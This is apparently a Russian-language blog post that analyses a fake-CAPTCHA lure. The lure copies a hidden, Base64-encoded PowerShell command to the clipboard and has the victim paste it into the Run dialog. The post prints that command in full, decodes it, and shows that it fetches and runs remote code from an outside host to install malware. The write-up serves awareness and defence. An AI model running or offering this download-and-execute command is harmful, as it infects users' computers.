🎯 На днях наткнулся на довольно забавный сценарий атаки, цель которой установка вредоносного ПО на компьютер Windows. В самом векторе атаки нет ничего не обычного, кроме пожалуй того, что для внедрения зловреда используются возможности PowerShell.
👉 Итак, при перенаправлении скриптом с вероятно зараженного сайта на прокладочную веб-страничку в браузере появился запрос на прохождение некой капчи. Для прохождения проверки пользователю предлагалось нажать кнопку на странице, а затем
Win +R
->
Ctrl+V
->
Enter
. Выполнив эту инструкцию, пользователь запустит к себе зловреда.
🤦♂️🛑 Что под капотом? При нажатии кнопки на сайте в буфер обмена копируется строка вызова PowerShell вида:
powershell -W Hidden -eC aQBlAHgAIAAoAGkAdwByACAAaAB0AHQAcABzADoALwAvAGkAcABsAG8AZwBnAGUAcgAuAHIAdQAvADIANQAwADkAMgA1ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAC4AQwBvAG4AdABlAG4AdAA=
🔹Из аргументов понятно, что это должно запустить скрытый PowerShell процесс (
-W Hidden
), который должен выполнить некую закодированную команду (
-eC
). Предполагается что это строка будет запущена доверчивым пользователем через стандартное окно "Выполнить" в меню Пуск.
🔹Сама выполняемая команда обсфуцирована с помощью кодировки Base64. Чтобы получить PowerShell команду в исходном виде, нужно декодировать ее из Base64 с помощью простой функции:
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("aQBlAHgAIAAoAGkAdwByACAAaAB0AHQAcABzADoALwAvAGkAcABsAG8AZwBnAGUAcgAuAHIAdQAvADIANQAwADkAMgA1ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAC4AQwBvAG4AdABlAG4AdAA="))
Что вернуло исходный код:
iex (iwr https://iplogger.ru/250925 -UseBasicParsing).Content
▶️ В данном случае
iex (алиас для
Invoke-Expression
) используется для запуска следующей команды
iwr (Invoke-WebRequest). IWR позволяет получить содержимое веб страницы, на которой размещен PowerShell код для внедрения зловреда. В результате будет запущен PowerShell скрипт, который скачает ZIP архив, распакует его и запустит некий процесс setup.exe. Дальше – дело техники.
👌 ✅ В общем-то довольно нехитрая атака, сценарий реализации основан на социальной инженерии, когда пользователь бездумно выполнит инструкцию на фишинговом сайте. Включенная по умолчанию политика запуска скриптов PowerShell Execution заблокирует запуск такого скрипта, но все же не даст 100% гарантии, т.к. можно запустить скрипт и в обход политики.